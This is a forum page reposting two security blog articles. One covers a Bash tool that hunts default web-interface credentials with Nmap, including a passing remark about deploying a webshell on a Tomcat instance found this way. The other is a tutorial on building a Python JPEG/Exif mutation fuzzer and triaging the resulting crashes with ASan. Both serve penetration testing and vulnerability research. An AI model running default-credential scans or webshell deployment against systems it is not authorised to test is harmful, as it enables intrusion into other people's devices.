-
Posts
18731 -
Joined
-
Last visited
-
Days Won
708
Everything posted by Nytro
-
Hunter of Default Logins (Web/HTTP) 2020-04-07 We all like them, don’t we? Those easy default credentials. Surely we do, but looking for them during penetration tests is not always fun. It’s actually hard work! Especially when we have a large environment. How can we check all those different web interfaces? Is there a viable automation? In this article we will present our HTTP default login hunter. Table Of Contents hide Introduction NNdefaccts alternate dataset Nmap script limitations Introducing default-http-login-hunter Additional features Fingerprint contribution Conclusion Thanks Introduction Checking administrative interfaces for weak and default credentials is a vital part of every VAPT exercise. But doing it manually can quickly become exhausting. The problem with web interfaces is that they are all different. And so to develop an universal automation that could do the job across multiple interfaces is very hard. Although there are some solutions for this, they are mostly commercial and the functionality is not even that great. Luckily there is a free and open source solution that can help us. NNdefaccts alternate dataset The NNdefaccts dataset made by nnposter is an alternate fingerprint dataset for the Nmap http-default-accounts.nse script. The NNdefacts dataset can test more than 380 different web interfaces for default logins. For comparison, the latest Nmap 7.80 default dataset only supports 55. Here are some examples of the supported web interfaces: Network devices (3Com, Asus, Cisco, D-Link, F5, Nortel..) Video cameras (AXIS, GeoVision, Hikvision, Sanyo..) Application servers (Apache Tomcat, JBoss EAP..) Monitoring software (Cacti, Nagios, OpenNMS..) Server management (Dell iDRAC, HP iLO..) Web servers (WebLogic, WebSphere..) Printers (Kyocera, Sharp, Xerox..) IP Phones (Cisco, Polycom..) Citrix, NAS4Free, ManageEngine, VMware.. See the following link for a full list: https://github.com/InfosecMatter/http-default-logins/blob/master/list.txt The usage is quite simple – we simply run the Nmap script with the alternate dataset as a parameter. Like this: nmap --script http-default-accounts --script-args http-default-accounts.fingerprintfile=~/http-default-accounts-fingerprints-nndefaccts.lua -p 80 192.168.1.1 This is already pretty great as it is. Nmap script limitations Now the only caveat with this solution is that the http-default-accounts.nse script works only for web servers running on common web ports such as tcp/80, tcp/443 or similar. This is because the script contains the following port rule which matches only common web ports: So what if we find a web server running on a different port – say tcp/9999? Unfortunately the Nmap script will not run because of the port rule.. ..unless we modify the port rule in the Nmap script to match our web server port! And that’s exactly where our new tool comes handy. Introducing default-http-login-hunter The default-http-login-hunter tool, written in Bash, is essentially a wrapper around the aforementioned technologies to unlock their full potential and to make things easy for us. The tool simply takes a URL as an argument: default-http-login-hunter.sh <URL> First it will make a local temporary copy of the http-default-accounts.nse script and it will modify the port rule so that it will match the web server port that we provided in the URL. Then it will run the Nmap command for us and display the output nicely. Here’s an example: From the above screenshot we can see that we found a default credentials for Apache Tomcat running on port tcp/9999. Now we could deploy a webshell on it and obtain RCE. But that’s another story. Additional features List of URLs The tool also accepts a list of URLs as an input. So for instance, we could feed it with URLs that we extracted from Nessus scan results using our Nessus CSV parser. The tool will go through all the URLs one by one and check for default logins. Like this: default-http-login-hunter.sh urls.txt Here the tool found a default login to the Cisco IronPort running on port https/9443. Resume-friendly Another useful feature is that it saves all the results in the current working directory. So if it gets accidentally interrupted, it will just continue where it stopped. Like in this example: Here we found some Polycom IP phones logins. Staying up-to-date To make sure that we have the latest NNdefacts dataset, run the update command: default-http-login-hunter.sh update And that’s pretty much it. If you want to see more detailed output, use -v parameter in the command line. You can find the tool in our InfosecMatter Github repository here. Fingerprint contribution I encourage everyone to check out the NNdefacts project and consider contributing with fingerprints that you found during your engagements. Contribution is not hard – you can simply record the login procedure in the Fiddler, Burp or ZAP and send the session file to the author. Please see more information on the fingerprint contribution here. You may find these links useful while hunting for default logins manually: https://cirt.net/passwords https://www.routerpasswords.com/ Conclusion This tool can be of a great help not only while performing internal infrastructure penetration tests, but everywhere where we need to test a web interface for default credentials. Its simple design and smart features make it also very easy to use. Hope you will find it useful too! Thanks Lastly, I want to thank nnposter for his awesome NNdefacts dataset without which this would not be possible and also for his contributions to the Nmap project. Thank you nnposter! Sursa: https://www.infosecmatter.com/hunter-of-default-logins-web-http/
-
- 1
-
-
Fuzzing Like A Caveman 28 minute read Introduction I’ve been passively consuming a lot of fuzzing-related material in the last few months as I’ve primarily tried to up my Windows exploitation game from Noob-Level to 1%-Less-Noob-Level, and I’ve found it utterly fascinating. In this post I will show you how to create a really simple mutation fuzzer and hopefully we can find some crashes in some open source projects with it. The fuzzer we’ll be creating is from just following along with @gynvael’s fuzzing tutorial on YouTube. I had no idea that Gynvael had streams so now I have dozens more hours of content to add to the never ending list of things to watch/read. I must also mention that Brandon Faulk’s fuzzing streams are incredible. I don’t understand roughly 99% of the things Brandon says, but these streams are captivating. My personal favorites so far have been his fuzzing of calc.exe and c-tags. He also has this wonderful introduction to fuzzing concepts video here: NYU Fuzzing Talk. Picking a Target I wanted to find a binary that was written in C or C++ and parsed data from a file. One of the first things I came across was binaries that parse Exif data out of images. We also want to pick a target with virtually no security implications since I’m publishing these findings in real time. From https://www.media.mit.edu/pia/Research/deepview/exif.html, Basically, Exif file format is the same as JPEG file format. Exif inserts some of image/digicam information data and thumbnail image to JPEG in conformity to JPEG specification. Therefore you can view Exif format image files by JPEG compliant Internet browser/Picture viewer/Photo retouch software etc. as a usual JPEG image files. So Exif inserts metadata type information into images in conformity with the JPEG spec, and there exists no shortage of programs/utilities which helpfully parse this data out. Getting Started We’ll be using Python3 to build a rudimentary mutation fuzzer that subtly (or not so subtly) alters valid Exif-filled JPEGs and feeds them to a parser hoping for a crash. We’ll also be working on an x86 Kali Linux distro. First thing’s first, we need a valid Exif-filled JPEG. A Google search for ‘Sample JPEG with Exif’ helpfully leads us to this repo. I’ll be using the Canon_40D.jpg image for testing. Getting to Know the JPEG and EXIF Spec Before we start just scribbling Python into Sublime Text, let’s first take some time to learn about the JPEG and Exif specification so that we can avoid some of the more obvious pitfalls of corrupting the image to the point that the parser doesn’t attempt to parse it and wastes precious fuzzing cycles. One thing to know from the previously referenced specification overview, is that all JPEG images start with byte values 0xFFD8 and end with byte values 0xFFD9. This first couple of bytes are what are known as ‘magic bytes’. This allows for straightforward file-type identification on *Nix systems. root@kali:~# file Canon_40D.jpg Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, components 3 We can take the .jpg off and get the same output. root@kali:~# file Canon Canon: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, components 3 If we hexdump the image, we can see the first and last bytes are in fact 0xFFD8 and 0xFFD9. root@kali:~# hexdump Canon 0000000 d8ff e0ff 1000 464a 4649 0100 0101 4800 ------SNIP------ 0001f10 5aed 5158 d9ff Another interesting piece of information in the specification overview is that ‘markers’ begin with 0xFF. There are several known static markers such as: the ‘Start of Image’ (SOI) marker: 0xFFD8 APP1 marker: 0xFFE1 generic markers: 0xFFXX the ‘End of Image’ (EOI) marker: 0xFFD9 Since we don’t want to change the image length or the file type, let’s go ahead and plan to keep the SOI and EOI markers intact when possible. We don’t want to insert 0xFFD9 into the middle of the image for example as that would truncate the image or cause the parser to misbehave in a non-crashy way. ‘Non-crashy’ is a real word. Also, this could be misguided and maybe we should be randomly putting EOI markers in the byte stream? Let’s see. Starting Our Fuzzer The first thing we’ll need to do is extract all of the bytes from the JPEG we want to use as our ‘valid’ input sample that we’ll of course mutate. Our code will start off like this: #!/usr/bin/env python3 import sys # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] data = get_bytes(filename) If we want to see how this data looks, we can print the first 10 or so byte values in the array and see how we’ll be interacting with them. We’ll just temporarily add something like: else: filename = sys.argv[1] data = get_bytes(filename) counter = 0 for x in data: if counter < 10: print(x) counter += 1 Running this shows that we’re dealing with neatly converted decimal integers which makes everything much easier in my opinion. root@kali:~# python3 fuzzer.py Canon_40D.jpg 255 216 255 224 0 16 74 70 73 70 Let’s just quickly see if we can create a new valid JPEG from our byte array. We’ll add this function to our code and run it. def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() So now we have mutated.jpg in our directory, let’s hash the two files and see if they match. root@kali:~# shasum Canon_40D.jpg mutated.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e Canon_40D.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e mutated.jpg Awesome, we have two identical files. Now we can get into the business of mutating the data before creating our mutated.jpg. Mutating We’ll keep our fuzzer relatively simple and only implement two different mutation methods. These methods will be: bit flipping overwriting byte sequences with Gynvael’s ‘Magic Numbers’ Let’s start with bit flipping. 255 (or 0xFF) in binary would be 11111111 if we were to randomly flip a bit in this number, let say at index number 2, we’d end up with 11011111. This new number would be 223 or 0xDF. I’m not entirely sure how different this mutation method is from randomly selecting a value from 0 - 255 and overwritng a random byte with it. My intuiton says that bit flipping is extremely similar to randomly overwriting bytes with an arbitrary byte. Let’s go ahead and say we want to only flip a bit in 1% of the bytes we have. We can get to this number in Python by doing: num_of_flips = int((len(data) - 4) * .01) We want to subtract 4 from the length of our bytearray because we don’t want to count the first 2 bytes or the last 2 bytes in our array as those were the SOI and EOI markers and we are aiming to keep those intact. Next we’ll want to randomly select that many indexes and target those indexes for bit flipping. We’ll go ahead and create a range of possible indexes we can change and then choose num_of_flips of them to randomly bit flip. indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 Let’s add import random to our script, and also add these debug print statements to make sure everything is working correctly. print("Number of indexes chosen: " + str(len(chosen_indexes))) print("Indexes chosen: " + str(chosen_indexes)) Our function right now looks like this: def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 print("Number of indexes chosen: " + str(len(chosen_indexes))) print("Indexes chosen: " + str(chosen_indexes)) If we run this, we get a nice output as expected: root@kali:~# python3 fuzzer.py Canon_40D.jpg Number of indexes chosen: 79 Indexes chosen: [6580, 930, 6849, 6007, 5020, 33, 474, 4051, 7722, 5393, 3540, 54, 5290, 2106, 2544, 1786, 5969, 5211, 2256, 510, 7147, 3370, 625, 5845, 2082, 2451, 7500, 3672, 2736, 2462, 5395, 7942, 2392, 1201, 3274, 7629, 5119, 1977, 2986, 7590, 1633, 4598, 1834, 445, 481, 7823, 7708, 6840, 1596, 5212, 4277, 3894, 2860, 2912, 6755, 3557, 3535, 3745, 1780, 252, 6128, 7187, 500, 1051, 4372, 5138, 3305, 872, 6258, 2136, 3486, 5600, 651, 1624, 4368, 7076, 1802, 2335, 3553] Next we need to actually mutate the bytes at those indexes. We need to bit flip them. I chose to do this in a really hacky way, feel free to implement your own solution. We’re going to covert the bytes at these indexes to binary strings and pad them so that they are 8 digits long. Let’s add this code and see what I’m talking about. We’ll be converting the byte value (which is in decimal remember) to a binary string and then padding it with leading zeroes if it’s less than 8 digits long. The last line is a temporary print statement for debugging. for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current As you can see, we have a nice output of binary numbers as strings. root@kali:~# python3 fuzzer.py Canon_40D.jpg 10100110 10111110 10010010 00110000 01110001 00110101 00110010 -----SNIP----- Now for each of these, we’ll randomly select an index, and flip it. Take the first one, 10100110, if select index 0, we have a 1, we’ll flip it to 0. Last considering for this code segment is that these are strings not integers remember. So the last thing we need to do is convert the flipped binary string to integer. We’ll create an empty list, add each digit to the list, flip the digit we randomly picked, and the construct a new string from all the list members. (We have to use this intermediate list step since strings are mutable). Finally, we convert it to an integer and return the data to our create_new() function to create a new JPEG. Our script now looks like this in total: #!/usr/bin/env python3 import sys import random # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current indexes = range(0,8) picked_index = random.choice(indexes) new_number = [] # our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0'] for i in current: new_number.append(i) # if the number at our randomly selected index is a 1, make it a 0, and vice versa if new_number[picked_index] == "1": new_number[picked_index] = "0" else: new_number[picked_index] = "1" # create our new binary string of our bit-flipped number current = '' for i in new_number: current += i # convert that string to an integer current = int(current,2) # change the number in our byte array to our new number we just constructed data[x] = current return data # create new jpg with mutated data def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] data = get_bytes(filename) mutated_data = bit_flip(data) create_new(mutated_data) Analyzing Mutation If we run our script, we can shasum the output and compare to the original JPEG. root@kali:~# shasum Canon_40D.jpg mutated.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e Canon_40D.jpg a7b619028af3d8e5ac106a697b06efcde0649249 mutated.jpg This looks promising as they have different hashes now. We can further analyze by comparing them with a program called Beyond Compare or bcompare. We’ll get two hexdumps with differences highlighted. As you can see, in just this one screen share we have 3 different bytes that have had their bits flipped. The original is on the left, the mutated sample is on the right. This mutation method appears to have worked. Let’s move onto implementing our second mutation method Gynvael’s Magic Numbers During the aformentioned GynvaelColdwind ‘Basics of fuzzing’ stream, he enumerates several ‘magic numbers’ which can have devestating effects on programs. Typically, these numbers relate to data type sizes and arithmetic-induced errors. The numbers discussed were: 0xFF 0x7F 0x00 0xFFFF 0x0000 0xFFFFFFFF 0x00000000 0x80000000 <—- minimum 32-bit int 0x40000000 <—- just half of that amount 0x7FFFFFFF <—- max 32-bit int If there is any kind of arithmetic performed on these types of values in the course of malloc() or other types of operations, overflows can be common. For instance if you add 0x1 to 0xFF on a one-byte register, it would roll over to 0x00 this can be unintended behavior. HEVD actually has an integer overflow bug similar to this concept. Let’s say our fuzzer chooses 0x7FFFFFFF as the magic number it wants to use, that value is 4 bytes long so we would have to find a byte index in our array, and overwrite that byte plus the next three. Let’s go ahead and start implementing this in our fuzzer. Implementing Mutation Method #2 First we’ll want to create a list of tuples like Gynvael did where the first number in the tuple is the byte-size of the magic number and the second number is the byte value in decimal of the first byte. def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) print(picked_magic) If we run this we can see that it’s randomly selecting a magic value tuple. root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 64) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 128) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 0) root@kali:~# python3 fuzzer.py Canon_40D.jpg (2, 255) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 0) We now need to overwrite a random 1 to 4 byte value in the JPEG with this new magic 1 to 4 byte value. We will set up our possible indexes the same as the previous method, select an index, and then overwrite the bytes at that index with our picked_magic number. So if we get (4, 128) for instance, we know its 4 bytes, and the magic number is 0x80000000. So we’ll do something like: byte[x] = 128 byte[x+1] = 0 byte[x+2] = 0 byte[x+3] = 0 All in all, our function will look like this: def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) length = len(data) - 8 index = range(0, length) picked_index = random.choice(index) # here we are hardcoding all the byte overwrites for all of the tuples that begin (1, ) if picked_magic[0] == 1: if picked_magic[1] == 255: # 0xFF data[picked_index] = 255 elif picked_magic[1] == 127: # 0x7F data[picked_index] = 127 elif picked_magic[1] == 0: # 0x00 data[picked_index] = 0 # here we are hardcoding all the byte overwrites for all of the tuples that begin (2, ) elif picked_magic[0] == 2: if picked_magic[1] == 255: # 0xFFFF data[picked_index] = 255 data[picked_index + 1] = 255 elif picked_magic[1] == 0: # 0x0000 data[picked_index] = 0 data[picked_index + 1] = 0 # here we are hardcoding all of the byte overwrites for all of the tuples that being (4, ) elif picked_magic[0] == 4: if picked_magic[1] == 255: # 0xFFFFFFFF data[picked_index] = 255 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 elif picked_magic[1] == 0: # 0x00000000 data[picked_index] = 0 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 128: # 0x80000000 data[picked_index] = 128 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 64: # 0x40000000 data[picked_index] = 64 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 127: # 0x7FFFFFFF data[picked_index] = 127 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 return data Analyzing Mutation #2 Running our script now and analyzing the results in Beyond Compare, we can see that a two byte value of 0xA6 0x76 was overwritten with 0xFF 0xFF. This is exactly what we wanted to accomplish. Starting to Fuzz Now that we have two reliable ways of mutating the data, we need to: mutate the data with one of our functions, create new picture with mutated data, feed mutated picture to our binary for parsing, catch any Segmentation faults and log the picture that caused it Victim? For our victim program, we will search Google with site:github.com "exif" language:c to find Github projects written in C that have a reference to ‘exif’. A quick looksie brings us to https://github.com/mkttanabe/exif. We can install by git cloning the repo, and using the building with gcc instructions included in the README. (I’ve placed the compiled binary in /usr/bin just for ease.) Let’s first see how the program handles our valid JPEG. root@kali:~# exif Canon_40D.jpg -verbose system: little-endian data: little-endian [Canon_40D.jpg] createIfdTableArray: result=5 {0TH IFD} tags=11 tag[00] 0x010F Make type=2 count=6 val=[Canon] tag[01] 0x0110 Model type=2 count=14 val=[Canon EOS 40D] tag[02] 0x0112 Orientation type=3 count=1 val=1 tag[03] 0x011A XResolution type=5 count=1 val=72/1 tag[04] 0x011B YResolution type=5 count=1 val=72/1 tag[05] 0x0128 ResolutionUnit type=3 count=1 val=2 tag[06] 0x0131 Software type=2 count=11 val=[GIMP 2.4.5] tag[07] 0x0132 DateTime type=2 count=20 val=[2008:07:31 10:38:11] tag[08] 0x0213 YCbCrPositioning type=3 count=1 val=2 tag[09] 0x8769 ExifIFDPointer type=4 count=1 val=214 tag[10] 0x8825 GPSInfoIFDPointer type=4 count=1 val=978 {EXIF IFD} tags=30 tag[00] 0x829A ExposureTime type=5 count=1 val=1/160 tag[01] 0x829D FNumber type=5 count=1 val=71/10 tag[02] 0x8822 ExposureProgram type=3 count=1 val=1 tag[03] 0x8827 PhotographicSensitivity type=3 count=1 val=100 tag[04] 0x9000 ExifVersion type=7 count=4 val=0 2 2 1 tag[05] 0x9003 DateTimeOriginal type=2 count=20 val=[2008:05:30 15:56:01] tag[06] 0x9004 DateTimeDigitized type=2 count=20 val=[2008:05:30 15:56:01] tag[07] 0x9101 ComponentsConfiguration type=7 count=4 val=0x01 0x02 0x03 0x00 tag[08] 0x9201 ShutterSpeedValue type=10 count=1 val=483328/65536 tag[09] 0x9202 ApertureValue type=5 count=1 val=368640/65536 tag[10] 0x9204 ExposureBiasValue type=10 count=1 val=0/1 tag[11] 0x9207 MeteringMode type=3 count=1 val=5 tag[12] 0x9209 Flash type=3 count=1 val=9 tag[13] 0x920A FocalLength type=5 count=1 val=135/1 tag[14] 0x9286 UserComment type=7 count=264 val=0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (omitted) tag[15] 0x9290 SubSecTime type=2 count=3 val=[00] tag[16] 0x9291 SubSecTimeOriginal type=2 count=3 val=[00] tag[17] 0x9292 SubSecTimeDigitized type=2 count=3 val=[00] tag[18] 0xA000 FlashPixVersion type=7 count=4 val=0 1 0 0 tag[19] 0xA001 ColorSpace type=3 count=1 val=1 tag[20] 0xA002 PixelXDimension type=4 count=1 val=100 tag[21] 0xA003 PixelYDimension type=4 count=1 val=68 tag[22] 0xA005 InteroperabilityIFDPointer type=4 count=1 val=948 tag[23] 0xA20E FocalPlaneXResolution type=5 count=1 val=3888000/876 tag[24] 0xA20F FocalPlaneYResolution type=5 count=1 val=2592000/583 tag[25] 0xA210 FocalPlaneResolutionUnit type=3 count=1 val=2 tag[26] 0xA401 CustomRendered type=3 count=1 val=0 tag[27] 0xA402 ExposureMode type=3 count=1 val=1 tag[28] 0xA403 WhiteBalance type=3 count=1 val=0 tag[29] 0xA406 SceneCaptureType type=3 count=1 val=0 {Interoperability IFD} tags=2 tag[00] 0x0001 InteroperabilityIndex type=2 count=4 val=[R98] tag[01] 0x0002 InteroperabilityVersion type=7 count=4 val=0 1 0 0 {GPS IFD} tags=1 tag[00] 0x0000 GPSVersionID type=1 count=4 val=2 2 0 0 {1ST IFD} tags=6 tag[00] 0x0103 Compression type=3 count=1 val=6 tag[01] 0x011A XResolution type=5 count=1 val=72/1 tag[02] 0x011B YResolution type=5 count=1 val=72/1 tag[03] 0x0128 ResolutionUnit type=3 count=1 val=2 tag[04] 0x0201 JPEGInterchangeFormat type=4 count=1 val=1090 tag[05] 0x0202 JPEGInterchangeFormatLength type=4 count=1 val=1378 0th IFD : Model = [Canon EOS 40D] Exif IFD : DateTimeOriginal = [2008:05:30 15:56:01] We see that the program is parsing out the tags and stating the byte values associated with them. This is pretty much exactly what we set out to find. Chasing Segfaults Ideally we’d like to feed this binary some mutated data and have it segfault meaning we have found a bug. The problem I ran into was that when I monitored stdout and stderr for the Segmentation fault message, it never appeared. That’s because the Segmentation fault message comes from our command shell instead of the binary. It means the shell received a SIGSEGV signal and in response prints the message. One way I found to monitor this was to use the run() method from the pexpect Python module and the quote() method from the pipes Python module. We’ll add a new function, that will take in a counter parameter which will be what fuzzing iteration we’re on and also the mutated data in another parameter. If we see Segmentation in the output of our run() command, we’ll write the mutated data to a file and save it so that we have the JPEG image that crashed the binary. Let’s create a new folder called crashes and we’ll save JPEGs in there that cause crashes in the format crash.<fuzzing iteration (counter)>.jpg. So if fuzzing iteration 100 caused a crash, we should get a file like: /crashes/crash.100.jpg. We’ll keep printing to the same line in the terminal to keep a count of every 100 fuzzing iterations. Our function looks like this: def exif(counter,data): command = "exif mutated.jpg -verbose" out, returncode = run("sh -c " + quote(command), withexitstatus=1) if b"Segmentation" in out: f = open("crashes/crash.{}.jpg".format(str(counter)), "ab+") f.write(data) if counter % 100 == 0: print(counter, end="\r") Next, we’ll alter our execution stub at the bottom of our script to run on a counter. Once we hit 1000 iterations, we’ll stop fuzzing. We’ll also have our fuzzer randomly select one of our mutation methods. So it might bit-flip or it might use a magic number. Let’s run it and then check our crashes folder when it completes. Once the fuzzer completes, you can see we got ~30 crashes! root@kali:~/crashes# ls crash.102.jpg crash.317.jpg crash.52.jpg crash.620.jpg crash.856.jpg crash.129.jpg crash.324.jpg crash.551.jpg crash.694.jpg crash.861.jpg crash.152.jpg crash.327.jpg crash.559.jpg crash.718.jpg crash.86.jpg crash.196.jpg crash.362.jpg crash.581.jpg crash.775.jpg crash.984.jpg crash.252.jpg crash.395.jpg crash.590.jpg crash.785.jpg crash.985.jpg crash.285.jpg crash.44.jpg crash.610.jpg crash.84.jpg crash.987.jpg We can test this now with a quick one-liner to confirm the results: root@kali:~/crashes# for i in *.jpg; do exif "$i" -verbose > /dev/null 2>&1; done. Remember, we can route both STDOUT and STDERR to /dev/null because “Segmentation fault” comes from the shell, not from the binary. We run this and this is the output: root@kali:~/crashes# for i in *.jpg; do exif "$i" -verbose > /dev/null 2>&1; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault -----SNIP----- You can’t see all of them, but that’s 30 segfaults, so everything appears to be working as planned! Triaging Crashes Now that we have ~30 crashes and the JPEGs that caused them, the next step would be to analyze these crashes and figure out how many of them are unique. This is where we’ll leverage some of the things I’ve learned watching Brandon Faulk’s streams. A quick look at the crash samples in Beyond Compare tells me that most were caused by our bit_flip() mutation and not the magic() mutation method. Interesting. As a test, while we progress, we can turn off the randomness of the function selection and run let’s say 100,000 iterations with just the magic() mutator and see if we get any crashes. Using ASan to Analyze Crashes ASan is the “Address Sanitizer” and it’s a utility that comes with newer versions of gcc that allows users to compile a binary with the -fsanitize=address switch and get access to a very detailed information in the event that a memory access bug occurs, even those that cause a crash. Obviously we’ve pre-selected for crashing inputs here so we will miss out on that utility but perhaps we’ll save it for another time. To use ASan, I follwed along with the Fuzzing Project and recompiled exif with the flags: cc -fsanitize=address -ggdb -o exifsan sample_main.c exif.c. I then moved exifsan to /usr/bin for ease of use. If we run this newly compiled binary on a crash sample, let’s see the output. root@kali:~/crashes# exifsan crash.252.jpg -verbose system: little-endian data: little-endian ================================================================= ==18831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb4d00758 at pc 0x00415b9e bp 0xbf8c91f8 sp 0xbf8c91ec READ of size 4 at 0xb4d00758 thread T0 #0 0x415b9d in parseIFD /root/exif/exif.c:2356 #1 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #2 0x4076ba in main /root/exif/sample_main.c:63 #3 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 #4 0x407310 in _start (/usr/bin/exifsan+0x2310) 0xb4d00758 is located 0 bytes to the right of 8-byte region [0xb4d00750,0xb4d00758) allocated by thread T0 here: #0 0xb7aa2097 in __interceptor_malloc (/lib/i386-linux-gnu/libasan.so.5+0x10c097) #1 0x415a9f in parseIFD /root/exif/exif.c:2348 #2 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #3 0x4076ba in main /root/exif/sample_main.c:63 #4 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/exif/exif.c:2356 in parseIFD Shadow bytes around the buggy address: 0x369a0090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x369a00e0: fa fa fa fa fa fa fa fa fa fa 00[fa]fa fa 04 fa 0x369a00f0: fa fa 00 06 fa fa 06 fa fa fa fa fa fa fa fa fa 0x369a0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==18831==ABORTING This is wonderful. Not only do we get detailed information but ASan also classifies the bug class for us, tells us the crash address and provides a nice stack trace. As you can see, we were performing a 4-byte read operation in the parseIFD function inside of exif.c. READ of size 4 at 0xb4d00758 thread T0 #0 0x415b9d in parseIFD /root/exif/exif.c:2356 #1 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #2 0x4076ba in main /root/exif/sample_main.c:63 #3 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 #4 0x407310 in _start (/usr/bin/exifsan+0x2310) Since this is all standard binary output now, we can actually triage these crashes and try to make sense of them. Let’s first try to deduplicate the crashes. It’s possible here that all 30 of our crashes are the same bug. It’s also possible that we have 30 unique crashes (not likely lol). So we need to sort that out. Let’s again appeal to a Python script, we’ll iterate through this folder, run the ASan enabled binary against each crash and log where the crashing address is for each. We’ll also try to capture if it’s a 'READ' or 'WRITE' operation as well. So for example, for crash.252.jpg, we’ll format the log file as: crash.252.HBO.b4f00758.READ and we’ll write the ASan output to the log. This way we know the crash image that caused it, the bug class, the address, and the operation before we even open the log. (I’ll post the triage script at the end, it’s so gross ugh, I hate it.) After running the triage script on our crashes folder, we can now see we have triaged our crashes and there is something very interesting. crash.102.HBO.b4f006d4.READ crash.102.jpg crash.129.HBO.b4f005dc.READ crash.129.jpg crash.152.HBO.b4f005dc.READ crash.152.jpg crash.317.HBO.b4f005b4.WRITE crash.317.jpg crash.285.SEGV.00000000.READ crash.285.jpg ------SNIP----- After a big SNIP there, out of my 30 crashes, I only had one WRITE operation. You can’t tell from the snipped output but I also had a lot of SEGV bugs where a NULL address was referenced (0x00000000). Let’s also check in on our modified fuzzer that was running only the magic() mutator for 100,000 iterations and see if it turned up any bugs. root@kali:~/crashes2# ls crash.10354.jpg crash.2104.jpg crash.3368.jpg crash.45581.jpg crash.64750.jpg crash.77850.jpg crash.86367.jpg crash.94036.jpg crash.12771.jpg crash.21126.jpg crash.35852.jpg crash.46757.jpg crash.64987.jpg crash.78452.jpg crash.86560.jpg crash.9435.jpg crash.13341.jpg crash.23547.jpg crash.39494.jpg crash.46809.jpg 